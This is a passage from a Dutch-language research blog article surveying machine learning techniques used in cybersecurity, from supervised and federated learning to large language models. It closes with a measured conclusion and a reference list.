<p>Hoe dan ook, ondanks mogelijke verbeteringen zou de wildgroei aan aankondigingen over AI op het gebied van cyberbeveiliging (Crowdstrike<a href="#_ftn2" name="_ftnref2"><sup>2</sup></a>, Google<a href="#_ftn3" name="_ftnref3"><sup>3</sup></a>, Microsoft<a href="#_ftn4" name="_ftnref4"><sup>4</sup></a> en SentinelOne<a href="#_ftn5" name="_ftnref5"><sup>5</sup></a> hebben bijvoorbeeld onlangs het gebruik van generatieve AI in hun beveiligingsproducten aangekondigd) tot grote teleurstellingen kunnen leiden. Deze teleurstellingen kunnen nog worden verergerd door het feit dat de prestaties of nauwkeurigheid van cyberbeveiligingssystemen niet over de hele linie zijn gestandaardiseerd. Hierdoor wordt het moeilijk om verschillende systemen te vergelijken, er rijzen dan ook vragen als: “<em>Wat is de beste manier om verschillende cyberbeveiligingssystemen te evalueren, te configureren of te vergelijken?</em>” of “<em>hebben we een universele methodologie om robuustheid en prestaties in alle of in verschillende scenario’s te beoordelen?</em>”&nbsp;<a href="#_ref6">[6]</a> of “<em>Zou een systeem dat goed presteert op de gegevens van de fabrikant ook goed presteren op mijn eigen gegevens?</em>” Meer prozaïsch, <em>“wat zit er echt achter de term kunstmatige intelligentie wanneer deze wordt gebruikt in combinatie met cyberbeveiligingsproducten?</em>”</p>



<p>Het antwoord op deze laatste vraag is verre van voor de hand liggend, gezien het grote aantal zeer verschillende technieken dat bij AI komt kijken. In het vervolg van dit artikel beschrijven we kort wat er achter de term “kunstmatige intelligentie” schuilgaat door een aantal basistechnieken te beschrijven die worden gebruikt in cyberbeveiliging. In volgende artikelen bespreken we het mogelijke gebruik van deze technieken voor zowel aanval als verdediging in de context van cyberbeveiliging.</p>



<h1 class="wp-block-heading">Belangrijkste technieken voor machinaal leren</h1>



<p>In de afgelopen tien jaar heeft machine learning aanzienlijke vooruitgang geboekt op een aantal verschillende gebieden, te beginnen met zogenaamde <strong>supervised</strong> modellen (de machine krijgt de klasse elementen die hij moet leren, bijvoorbeeld of een bepaalde transactie frauduleus of onschuldig is), dan <strong>unsupervised</strong> (de machine moet zelf de verschillende klassen ontdekken op basis van de gegevens), dan <strong>reinforcement learning</strong> (de machine krijgt een vorm van beloning als hij informatie correct classificeert). Figuur&nbsp;1 toont de belangrijkste algoritmen voor machinaal leren die worden gebruikt in cyberbeveiliging.</p>



<figure class="wp-block-image aligncenter size-large"><a href="/wp-content/uploads/2023/12/Learning-algorithms.png"><img loading="lazy" decoding="async" width="1024" height="521" src="/wp-content/uploads/2023/12/Learning-algorithms-1024x521.png" alt="" class="wp-image-19728" srcset="https://www.smalsresearch.be/wp-content/uploads/2023/12/Learning-algorithms-1024x521.png 1024w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Learning-algorithms-768x390.png 768w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Learning-algorithms-2048x1041.png 2048w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Learning-algorithms-300x153.png 300w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Learning-algorithms-1536x781.png 1536w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></a><figcaption class="wp-element-caption">Figuur 1 – De belangrijkste algoritmen voor machinaal leren die worden gebruikt in cyberbeveiliging (volgens <a href="#_ref7">[7]</a>).</figcaption></figure>



<h1 class="wp-block-heading">Supervised learning</h1>



<p>Modellen voor supervised learning worden getraind op gelabelde gegevens, d.w.z. voor elk item in de trainingsdataset wordt een categorie opgegeven. Een categorie kan binair zijn (bijv. “aanval” of “onschuldig”) of meervoudig (bijv. type aanval). Dit vereist kostbaar handmatig werk om de gegevens vooraf te categoriseren. Voor een cyberbeveiligingssysteem betekent dit bijvoorbeeld dat analisten elk stuk gegevens categoriseren dat ze hebben geanalyseerd, met de extra moeilijkheid dat er over het algemeen weinig voorbeelden van aanvallen zijn in vergelijking met de andere voorbeelden.</p>



<p>Leren bestaat dan uit het ontdekken, uit de gelabelde gegevens, van de kenmerken die geassocieerd worden met elke categorie en het bouwen van een model dat met een bepaalde waarschijnlijkheid kan vaststellen tot welke categorie een nieuw element behoort dat nog nooit gezien is tijdens het leren.</p>



<p>Deze gesuperviseerde systemen kunnen echter niet worden gebruikt om aanvalstypen te detecteren die hun nog niet bekend zijn. Sterker nog, hoewel supervised learning bijzonder goed werkt voor het herkennen van objecten in afbeeldingen, levert de detectie van cyberbeveiligingsbedreigingen bijzondere problemen op. Inderdaad, zoals opgemerkt door Apruzzese et al.&nbsp;<a href="#_ref8">[8]</a>, een sample die in de ene context als kwaadaardig wordt bestempeld, kan in een andere context onschuldig zijn, een sample kan speciaal zijn gemaakt om op een onschuldig sample te lijken, of een sample die vandaag als onschuldig wordt bestempeld, kan morgen gevaarlijk blijken te zijn.</p>



<p>Voorbeelden van algoritmen voor supervised learning zijn: decision trees (DT), random forests (RF), naïeve Bayes-classificatie<a href="#_ftn6" name="_ftnref6"><sup>6</sup></a>, neural networks (NN)<a href="#_ftn7" name="_ftnref7"><sup>7</sup></a>, support vector machines (SVM), etc.</p>



<h1 class="wp-block-heading">Unsupervised learning</h1>



<p>Algoritmen voor unsupervised learning leren daarentegen informatie en maken groepen op basis van alle trainingsgegevens, zonder de categorie van elk gegeven te kennen. Het verschil tussen supervised learning en unsupervised learning is dat de laatste geen categorielabels in de trainingsgegevens heeft.</p>



<p>Voorbeelden van algoritmen voor unsupervised learning zijn algoritmen die samples van hetzelfde type proberen te groeperen, zoals k-means partitionering en k-nearest neighbours (k-NN). Naast clusteren is het meer recente gebruik van auto-encoders een vrij populaire techniek voor het detecteren van anomalieën en, in het bijzonder, inbraken (bijv. <a href="#_ref9">[9]</a>).</p>



<p>Een auto-encoder bestaat uit een inputlaag (encoder), verschillende verborgen lagen en een outputlaag (decoder). Het doel is om een gecomprimeerde representatie van bepaalde invoergegevens te leren. De encoder wordt gebruikt om de invoergegevens in kaart te brengen in een verborgen representatie, de decoder wordt gebruikt om de invoergegevens te reconstrueren uit een dergelijke representatie. Een encoder kan worden getraind met goedaardige gegevens om een normale voorstelling van het verkeer op een netwerk te leren. Vervolgens wordt tijdens de detectiefase een sample als abnormaal beschouwd als de reconstructiefout na codering groter is dan een bepaald niveau.</p>



<h1 class="wp-block-heading">Semi-supervised learning</h1>



<p>Semi-supervised learning is gebaseerd op zowel gelabelde als ongelabelde gegevens. Het benut efficiënte classificeerders die kleine hoeveelheden gelabelde gegevens nodig hebben door gebruik te maken van informatie verkregen uit grote sets ongelabelde gegevens. Veel onderzoekers hebben geconstateerd dat ongelabelde gegevens, indien gebruikt in combinatie met een kleine hoeveelheid gelabelde gegevens, de leernauwkeurigheid aanzienlijk kunnen verbeteren in vergelijking met unsupervised learning, maar zonder de tijd en kosten die nodig zijn voor supervised learning.</p>



<p>Bij actief leren&nbsp;<a href="#_ref10">[10]</a> kan bijvoorbeeld een classificator die aanvankelijk is getraind op een kleine set gelabelde gegevens (bijv. “normal”, “rootkit”, “teardrop”<a href="#_ftn8" name="_ftnref8"><sup>8</sup></a>) worden gebruikt om een grote set ruwe gegevens te analyseren en vervolgens de meest voordelige samples “voor te stellen” om te labelen. Deze samples worden geselecteerd met behulp van een algoritme voor ongesuperviseerde anomaliedetectie. Vervolgens wordt een expert geraadpleegd om de voorgestelde samples te labelen en wordt het model bijgewerkt.</p>



<p>Verschillende auteurs hebben oplossingen met semi-supervised learning voorgesteld in verschillende cyberbeveiligingsdomeinen, of het nu gaat om malwaredetectie (bijv.&nbsp;<a href="#_ref12">[12]</a>) of inbraakdetectie (bijv.&nbsp;<a href="#_ref13">[13]</a>). Veel methoden zijn geïnspireerd op de populaire co-learning methode&nbsp;<a href="#_ref14">[14]</a> die eind jaren 1990 werd voorgesteld.</p>



<h1 class="wp-block-heading">Reinforcement learning</h1>



<p>Reinforcement learning (RL) is gebaseerd op trial and error: een autonome agent leert om beslissingen te nemen in een gegeven omgeving. De omgeving beloont de agent al dan niet voor elke beslissing die hij neemt. De trainingsgegevens in reinforcement learning zijn een mix van gesuperviseerde en niet gesuperviseerde benaderingen: in plaats van gegevens te voorzien van het juiste label, verkent het algoritme acties tot ze juist zijn.</p>



<p>Ondanks het voordeel van reinforcement learning, dat zich kan aanpassen aan veranderingen in de omgeving, is er nog steeds één moeilijkheid die het gebruik ervan in cyberbeveiliging beperkt: het definiëren van de beloningsfunctie, met name op het gebied van inbraakdetectie&nbsp;<a href="#_ref15">[15]</a>,&nbsp;<a href="#_ref16">[16]</a>.</p>



<h1 class="wp-block-heading">Federated machine learning</h1>



<p>Geïntroduceerd door McMahan et al.&nbsp;<a href="#_ref17">[17]</a>, is federated learning een gedistribueerde en collaboratieve manier van machinaal leren. De machines die betrokken zijn bij het leren zijn niet verplicht om hun gegevens te delen en sturen slechts modellen die geleerd zijn van hun gegevens om bij te dragen aan een globaal model dat het resultaat is van het combineren van alle lokale modellen<a href="#_ftn9" name="_ftnref9"><sup>9</sup></a>.</p>



<figure class="wp-block-image aligncenter size-large"><a href="/wp-content/uploads/2023/12/Federated-learning.png"><img loading="lazy" decoding="async" width="616" height="1024" src="/wp-content/uploads/2023/12/Federated-learning-616x1024.png" alt="" class="wp-image-19729" srcset="https://www.smalsresearch.be/wp-content/uploads/2023/12/Federated-learning-616x1024.png 616w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Federated-learning-180x300.png 180w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Federated-learning-768x1277.png 768w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Federated-learning-924x1536.png 924w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Federated-learning-1232x2048.png 1232w, https://www.smalsresearch.be/wp-content/uploads/2023/12/Federated-learning-scaled.png 1540w" sizes="auto, (max-width: 616px) 100vw, 616px" /></a><figcaption class="wp-element-caption">Figuur 2 – Voorbeeld van gecentraliseerd federated learning: een centrale server orkestreert het leren, waardoor een relatief eenvoudig protocol mogelijk is. In het niet-gecentraliseerde geval sturen deelnemers elkaar gedeeltelijke modellen op peer-to-peer basis.</figcaption></figure>



<p>Volgens Hernández-Ramos et al.&nbsp;<a href="#_ref18">[18]</a> zou federated learning een belangrijke rol kunnen spelen op het gebied van cyberbeveiliging, omdat het afzonderlijke organisaties in staat zou kunnen stellen informatie over beveiligingsbedreigingen en aanvallen te delen zonder dat ze hun feitelijke en mogelijk gevoelige gegevens hoeven te delen<a href="#_ftn10" name="_ftnref10"><sup>10</sup>,</a><a href="#_ftn11" name="_ftnref11"><sup>11</sup></a>. In hun analyse wijzen de auteurs erop dat het gebruik van federated machine learning op het gebied van inbraakdetectie de afgelopen jaren is toegenomen<a href="#_ftn12" name="_ftnref12"><sup>12</sup></a>. Ondanks hun kosten en beperkingen worden supervised federated methods nog steeds het meest bestudeerd in vergelijking met unsupervised federated methods.</p>



<h1 class="wp-block-heading"><a id="LLM"></a>Large Language Models</h1>



<p>Grote taalmodellen (Large Language Models, LLM) worden verkregen door unsupervised learning van diepe neurale netwerken<a href="#_ftn13" name="_ftnref13"><sup>13</sup></a> die getraind zijn op zeer grote hoeveelheden ongelabelde tekst. Deze omvatten generative pre-trained transformers, (GPT)&nbsp;<a href="#_ref20">[20]</a>,&nbsp;<a href="#_ref21">[21]</a>, waarvan de belangrijkste functie is om statistisch het volgende woord in een tekstpassage te voorspellen<a href="#_ftn14" name="_ftnref14"><sup>14</sup></a>. Een meer gedetailleerde beschrijving van deze modellen is te vinden in&nbsp;<a href="#_ref22">[22]</a>.</p>



<p>Toepassingen van deze modellen op cyberbeveiliging zijn nog beperkt, omdat maar weinig toepassingen tekst en gegevens in natuurlijke taal gebruiken. Een intrigerend aspect van deze massale taalmodellen is echter de betwiste aanname dat ze emergente capaciteiten vertonen, die <em>“niet aanwezig zijn in kleinschaligere modellen, maar wel in grootschalige modellen”</em>&nbsp;<a href="#_ref23">[23]</a>,&nbsp;<a href="#_ref24">[24]</a>. Dit roept de vraag op of deze opkomende capaciteiten ook cyberbeveiliging kunnen omvatten.</p>



<p>Eén benadering om LLM-architecturen te benutten is om transformers en andere architecturale aspecten van LLM’s te gebruiken en het model vooraf te trainen op beveiligingsgegevens. Hoewel transformers het meest bekend zijn om hun resultaten in natuurlijke taalverwerking, kunnen ze ook worden overwogen voor inbraakdetectie (bijvoorbeeld <a href="#_ref25">[25]</a>).</p>



<p>Gezien de recente ontwikkelingen in generatieve modellen is het zeer waarschijnlijk dat deze in de komende jaren uitgebreid zullen worden bestudeerd voor de ontwikkeling van inbraakdetectie.</p>



<h1 class="wp-block-heading">Conclusies</h1>



<p>De belangstelling voor AI-technieken op het gebied van beveiliging is duidelijk, al is het maar gezien het grote aantal publicaties, literatuurartikelen over het onderwerp en cybersecurityproducten die prat gaan op het gebruik ervan.</p>



<p>Hoewel er geen twijfel over bestaat dat AI nuttig is voor het analyseren van bestaande gegevens, zijn de gegeven resultaten a priori, zoals we hebben gezien, gebaseerd op reeds waargenomen gegevens. Het gevolg is dat, ondanks de indrukwekkende reputatie van AI het doet vermoeden, het nog niet bewezen dat AI creatief vermogen heeft om nieuwe aanvalsvectoren te detecteren, die expertise en menselijke intuïtie vereisen. Bovendien hangt de beoordeling van een risico af van vele factoren die soms moeilijk te kwantificeren zijn, zoals de geopolitieke of sociaaleconomische context.</p>



<p>AI moet daarom worden gezien als een stap in de evolutie van de beveiliging, en niet als een complete revolutie. Zoals we in een toekomstig artikel zullen zien, speelt het een rol bij het verbeteren van de veiligheidspraktijken, maar mag het niet volledig in de plaats komen van menselijke interventie en besluitvorming.</p>



<h1 class="wp-block-heading">Referenties</h1>



<p><a name="_ref1"></a>[1]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; N. Fatès, ‘Que faire de l’expression intelligence artificielle ?’, <em>Alliage : Culture-Science-Technique</em>, nov. 2023.</p>



<p><a name="_ref2"></a>[2]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Brundage <em>e.a.</em>, ‘The malicious use of artificial intelligence: forecasting, prevention and mitigation’, feb. 2018.</p>



<p><a name="_ref3"></a>[3]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; C. Villani, ‘Donner un sens à l’intelligence artificielle &#8211; Pour une stratégie nationale et européenne’, mrt. 2018. [Online]. Beschikbaar op: <a href="https://www.vie-publique.fr/rapport/37225-donner-un-sens-lintelligence-artificielle-pour-une-strategie-nation" target="_blank" rel="noopener">https://www.vie-publique.fr/rapport/37225-donner-un-sens-lintelligence-artificielle-pour-une-strategie-nation</a></p>



<p><a name="_ref4"></a>[4]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Taddeo, T. McCutcheon, en L. Floridi, ‘Trusting artificial intelligence in cybersecurity is a double-edged sword’, <em>Nat Mach Intell</em>, vol. 1, nr. 12, pp. 557-560, nov. 2019, <a href="https://www.doi.org/10.1038/s42256-019-0109-1" target="_blank" rel="noopener">doi: 10.1038/s42256-019-0109-1</a>.</p>



<p><a name="_ref5"></a>[5]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; K. Renaud, M. Warkentin, en G. Westerman, ‘From ChatGPT to HackGPT: Meeting the cybersecurity threat of generative AI’, <em>MIT Sloan Management Review</em>, 18 april 2023.</p>



<p><a name="_ref6"></a>[6]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; D. Dasgupta, Z. Akhtar, en S. Sen, ‘Machine learning in cybersecurity: a comprehensive survey’, <em>Journal of Defense Modeling &amp; Simulation</em>, vol. 19, nr. 1, pp. 57-106, jan. 2022, <a href="https://www.doi.org/10.1177/1548512920951275" target="_blank" rel="noopener">doi: 10.1177/1548512920951275</a>.</p>



<p><a name="_ref7"></a>[7]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; G. Apruzzese <em>e.a.</em>, ‘The role of machine learning in cybersecurity’, <em>Digital Threats</em>, vol. 4, nr. 1, pp. 1-38, mrt. 2023, <a href="https://www.doi.org/10.1145/3545574" target="_blank" rel="noopener">doi: 10.1145/3545574</a>.</p>



<p><a name="_ref8"></a>[8]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; G. Apruzzese, P. Laskov, en A. Tastemirova, ‘SoK: The impact of unlabelled data in cyberthreat detection’, in <em>2022 IEEE 7th European Symposium on Security and Privacy (EuroS&amp;P)</em>, jun. 2022, pp. 20-42. <a href="https://www.doi.org/10.1109/EuroSP53844.2022.00010" target="_blank" rel="noopener">doi: 10.1109/EuroSP53844.2022.00010</a>.</p>



<p><a name="_ref9"></a>[9]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Y. Mirsky, T. Doitshman, Y. Elovici, en A. Shabtai, ‘Kitsune: An ensemble of autoencoders for online network intrusion detection’. arXiv, 27 mei 2018. Geraadpleegd: 26 oktober 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/1802.09089" target="_blank" rel="noopener">http://arxiv.org/abs/1802.09089</a></p>



<p><a name="_ref10"></a>[10]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; K. Yang, J. Ren, Y. Zhu, en W. Zhang, ‘Active learning for wireless IoT intrusion detection’, <em>IEEE Wireless Commun.</em>, vol. 25, nr. 6, pp. 19-25, dec. 2018, <a href="https://www.doi.org/10.1109/MWC.2017.1800079" target="_blank" rel="noopener">doi: 10.1109/MWC.2017.1800079</a>.</p>



<p><a name="_ref11"></a>[11]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ‘KDD Cup 1999 Data’. Geraadpleegd: 8 december 2023. [Online]. Beschikbaar op: <a href="https://kdd.ics.uci.edu/databases/kddcup99/kddcup99.html" target="_blank" rel="noopener">http://kdd.ics.uci.edu/databases/kddcup99/kddcup99.html</a></p>



<p><a name="_ref12"></a>[12]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Koza, M. Krčál, en M. Holeňa, ‘Two semi-supervised approaches to malware detection with neural networks’, gepresenteerd bij Information technologies &#8211; Applications and theory (ITAT), 2020.</p>



<p><a name="_ref13"></a>[13]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; L. Sun, Y. Zhou, Y. Wang, C. Zhu, en W. Zhang, ‘The effective methods for intrusion detection with limited network attack data: multi-task learning and oversampling’, <em>IEEE Access</em>, vol. 8, pp. 185384-185398, 2020, <a href="https://www.doi.org/10.1109/ACCESS.2020.3029100" target="_blank" rel="noopener">doi: 10.1109/ACCESS.2020.3029100</a>.</p>



<p><a name="_ref14"></a>[14]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A. Blum en T. Mitchell, ‘Combining labeled and unlabeled data with co-training’, in <em>Proceedings of the eleventh annual conference on Computational learning theory</em>, Madison Wisconsin USA: ACM, jul. 1998, pp. 92-100. <a href="https://www.doi.org/10.1145/279943.279962" target="_blank" rel="noopener">doi: 10.1145/279943.279962</a>.</p>



<p><a name="_ref15"></a>[15]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; E. Bertino, M. Kantarcioglu, C. G. Akcora, S. Samtani, S. Mittal, en M. Gupta, ‘AI for security and security for AI’, in <em>Proceedings of the Eleventh ACM Conference on Data and Application Security and Privacy</em>, Virtual Event USA: ACM, apr. 2021, pp. 333-334. <a href="https://www.doi.org/10.1145/3422337.3450357" target="_blank" rel="noopener">doi: 10.1145/3422337.3450357</a>.</p>



<p><a name="_ref16"></a>[16]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; M. Lopez-Martin, B. Carro, en A. Sanchez-Esguevillas, ‘Application of deep reinforcement learning to intrusion detection for supervised problems’, <em>Expert Systems with Applications</em>, vol. 141, p. 112963, mrt. 2020, <a href="https://www.doi.org/10.1016/j.eswa.2019.112963" target="_blank" rel="noopener">doi: 10.1016/j.eswa.2019.112963</a>.</p>



<p><a name="_ref17"></a>[17]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; H. B. McMahan, E. Moore, D. Ramage, en S. Hampson, ‘Communication-efﬁcient learning of deep networks from decentralized data’, <em>Proceedings of machine learning research</em>, pp. 1273-1282, apr. 2017.</p>



<p><a name="_ref18"></a>[18]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. L. Hernández-Ramos <em>e.a.</em>, ‘Intrusion detection based on federated learning: a systematic review’. arXiv, 18 augustus 2023. Geraadpleegd: 17 oktober 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2308.09522" target="_blank" rel="noopener">http://arxiv.org/abs/2308.09522</a></p>



<p><a name="_ref19"></a>[19]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; E.-M. El-Mhamdi <em>e.a.</em>, ‘On the impossible safety of large AI models’. arXiv, 9 mei 2023. Geraadpleegd: 17 oktober 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2209.15259" target="_blank" rel="noopener">http://arxiv.org/abs/2209.15259</a></p>



<p><a name="_ref20"></a>[20]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; A. Vaswani <em>e.a.</em>, ‘Attention is all you need’, <em>Advances in neural information processing systems</em>, vol. 30, 2017.</p>



<p><a name="_ref21"></a>[21]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; T. Lin, Y. Wang, X. Liu, en X. Qiu, ‘A survey of transformers’, <em>AI Open</em>, vol. 3, pp. 111-132, 2022, <a href="https://www.doi.org/10.1016/j.aiopen.2022.10.001" target="_blank" rel="noopener">doi: 10.1016/j.aiopen.2022.10.001</a>.</p>



<p><a name="_ref22"></a>[22]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; B. Vanhalst, ‘Een eigen vraag- en antwoordsysteem op basis van taalmodellen | Smals Research’, Smals Research Blog. Geraadpleegd: 17 oktober 2023. [Online]. Beschikbaar op: <a href="/een-eigen-vraag-en-antwoordsysteem-op-basis-van-taalmodellen/" target="_blank" rel="noopener">/een-eigen-vraag-en-antwoordsysteem-op-basis-van-taalmodellen/</a></p>



<p><a name="_ref23"></a>[23]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; J. Wei <em>e.a.</em>, ‘Emergent abilities of large language models’. arXiv, 26 oktober 2022. Geraadpleegd: 9 november 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2206.07682" target="_blank" rel="noopener">http://arxiv.org/abs/2206.07682</a></p>



<p><a name="_ref24"></a>[24]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; R. Schaeffer, B. Miranda, en S. Koyejo, ‘Are Emergent Abilities of Large Language Models a Mirage?’ arXiv, 22 mei 2023. Geraadpleegd: 9 november 2023. [Online]. Beschikbaar op: <a href="https://arxiv.org/abs/2304.15004" target="_blank" rel="noopener">http://arxiv.org/abs/2304.15004</a></p>



<p><a name="_ref25"></a>[25]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Z. Wu, H. Zhang, P. Wang, en Z. Sun, ‘RTIDS: A Robust Transformer-Based Approach for Intrusion Detection System’, <em>IEEE Access</em>, vol. 10, pp. 64375-64387, 2022, <a href="https://www.doi.org/10.1109/ACCESS.2022.3182333" target="_blank" rel="noopener">doi: 10.1109/ACCESS.2022.3182333</a>.</p>



<p>&nbsp;</p>



<h1 class="wp-block-heading">Voetnoten&nbsp;</h1>



<p><a href="#_ftnref1" name="_ftn1"><sup>1</sup></a>&nbsp; <a href="/1-an-chatgpt/">/1-an-chatgpt/</a></p>



<p><a href="#_ftnref2" name="_ftn2"><sup>2</sup></a>&nbsp; <a href="https://www.crowdstrike.com/blog/crowdstrike-introduces-charlotte-ai-to-deliver-generative-ai-powered-cybersecurity/">https://www.crowdstrike.com/blog/crowdstrike-introduces-charlotte-ai-to-deliver-generative-ai-powered-cybersecurity/</a></p>



<p><a href="#_ftnref3" name="_ftn3"><sup>3</sup></a>&nbsp; <a href="https://cloud.google.com/blog/products/identity-security/rsa-introducing-ai-powered-investigation-chronicle-security-operations">https://cloud.google.com/blog/products/identity-security/rsa-introducing-ai-powered-investigation-chronicle-security-operations</a></p>



<p><a href="#_ftnref4" name="_ftn4"><sup>4</sup></a>&nbsp; <a href="https://www.microsoft.com/en-us/security/business/ai-machine-learning/microsoft-security-copilot">https://www.microsoft.com/en-us/security/business/ai-machine-learning/microsoft-security-copilot</a></p>



<p><a href="#_ftnref5" name="_ftn5"><sup>5</sup></a>&nbsp; <a href="https://www.sentinelone.com/blog/purple-ai-empowering-cybersecurity-analysts-with-ai-driven-threat-hunting-analysis-response/">https://www.sentinelone.com/blog/purple-ai-empowering-cybersecurity-analysts-with-ai-driven-threat-hunting-analysis-response/</a></p>



<p><a href="#_ftnref6" name="_ftn6"><sup>6</sup></a>&nbsp; De term naïef is gekoppeld aan het feit dat de methode uitgaat van een hoge mate van onafhankelijkheid van de gebruikte kenmerken.</p>



<p><a href="#_ftnref7" name="_ftn7"><sup>7</sup></a>&nbsp; Er zijn vele soorten kunstmatige neurale netwerken, waaronder feedforward neural networks (FFNN) – zoals de beroemde meerlaagse perceptron – convolutional neural networks (CNN), en recurrent neural networks (RNN).</p>



<p><a href="#_ftnref8" name="_ftn8"><sup>8</sup></a>&nbsp; Deze en verschillende andere labels worden gebruikt in de populaire KDD-99 dataset&nbsp;<a href="#_ref11">[11]</a>, die erg populair is in onderzoek naar inbraakdetectie.</p>



<p><a href="#_ftnref9" name="_ftn9"><sup>9</sup></a>&nbsp; Hoewel de soorten lokale modellen voor elke deelnemer verschillend kunnen zijn, houden maar weinig werken rekening met deze mogelijkheid. Bovendien gebruiken de meeste werken een gewogen gemiddelde om het centrale model bij te werken en kunnen ze niet goed rekening houden met de heterogeniteit van gegevens en apparaten.</p>



<p><a href="#_ftnref10" name="_ftn10"><sup>10</sup></a> Deze stimulans om te delen is in overeenstemming met de Europese regelgeving op het gebied van cyberbeveiliging, die het melden van cyberbeveiligingsincidenten verplicht stelt</p>



<p><a href="#_ftnref11" name="_ftn11"><sup>11</sup></a> Toch wordt de veiligheid van deze federated models betwist&nbsp;<a href="#_ref19">[19]</a>.</p>



<p><a href="#_ftnref12" name="_ftn12"><sup>12</sup></a> Het aantal publicaties over dit onderwerp is gestegen van minder dan 5 in 2018 naar meer dan 150 in 2022.</p>



<p><a href="#_ftnref13" name="_ftn13"><sup>13</sup></a> Dat wil zeggen, een neuraal netwerk met minstens twee opeenvolgende lagen neuronen.</p>



<p><a href="#_ftnref14" name="_ftn14"><sup>14</sup></a> Als het model groot genoeg is, blijkt dat niet alleen de grammatica van de menselijke talen kan worden geleerd, maar ook de betekenis van woorden, gemeenschappelijke kennis en primitieve logica. Als een model bijvoorbeeld het zinsfragment “<em>De kat van mijn buurman is</em>” als input krijgt, zal het veel eerder “<em>grijs</em>” of “<em>mager</em>” voorspellen dan “<em>Franstalig</em>”, ook al zijn alle drie de woorden bijvoeglijke naamwoorden. Op dezelfde manier kunnen we verwachten dat het model een coherente zin voorspelt als we een volledige zin opgeven.</p>



<p>_________________________<br data-rich-text-line-break="true"><br data-rich-text-line-break="true"></p>



<p><em>Dit is een ingezonden bijdrage van Fabien A. P. Petitcolas, IT-beveiligingsspecialist bij Smals Research. Dit artikel werd geschreven in eigen naam en neemt geen standpunt in namens Smals.</em></p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
